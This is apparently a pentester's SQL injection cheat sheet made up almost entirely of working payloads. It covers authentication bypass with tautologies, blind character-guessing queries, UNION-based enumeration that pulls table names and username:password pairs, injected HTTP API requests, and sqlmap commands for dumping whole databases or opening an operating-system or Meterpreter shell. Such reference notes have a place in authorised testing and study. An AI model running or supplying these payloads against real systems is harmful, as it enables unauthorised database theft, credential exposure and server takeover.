4.7 KiB
4.7 KiB
SQL Injection
Finding an Opportunity
- GET parameter
http://example.com/index.php?id=' or 1=1 -- -
- Sometimes an ID or may come first
http://example.com/index.php?id=10 or 1=1 -- +
http://example.com/index.php?id=10' or '1'='1'-- -
http://example.com/index.php?id=-1' or 1=1 -- -&password=x
- Provoke error to gain information
http://example.com/index.php?id='
- Incase of client side sanitization craft the URL instead of using the form!!!
Usage
- Example, terminate string via
'
and resolve via tautology, comment the rest of the string via--
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
Boolean True and False
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
Blind injection // Guessing characters
http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
- Function substr(string, start, length)
- sqlmap via
--level=5 --risk=3 --dbms=sqlite --technique=b --dump
Union based
- First method_ check by order until error occurs
' order by 1 -- -
' order by 2 -- -
' order by 3 -- -
- Second method fuzzing NULL values, followed by fuzzing data types
- Check number of cols
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs
- Check which one is a string
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
- Retrieve content, for cols and comment two times as an example. Or dump database
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
Identify Database
id=sqlite_version()
id=@@version # mysql/mssql
id=(SELECT banner FROM v$version) # oracle
SQL Functions
- Use sql functions to fumble the tables & cols via union
- source
- Extract tables
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
- sqlite specific
' UNION SELECT sql, sql FROM sqlite_master -- -
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
- Extract cols
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
- Data from cols
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
Examples
- sqli inside HTTP request to an API. Five values inside select have been discovered before
GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
* Get col names
```HTTP
GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
* Get notes from users by id
```HTTP
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
```
Tools
SQLmap
- sqlmap
- CheatSheet
- Examples
- Use
-r
with a saved HTTP request
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
- Select form data automatically
sqlmap -u http://<target-IP>/site.php --forms --dump-all
|Parameter|Details| |-r|Uses the intercepted request save as a file| |--dbms|DBMS of target| |--dump|Dump the entire database| |--dump-all|Dump everything| |-p |TESTPARAMETER| |--os-shell|Prompt for an interactive operating system shell| |--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
Damn Small SQLi Scanner (DSSS)
python dsss.py -u "http://example.com/index.php?id="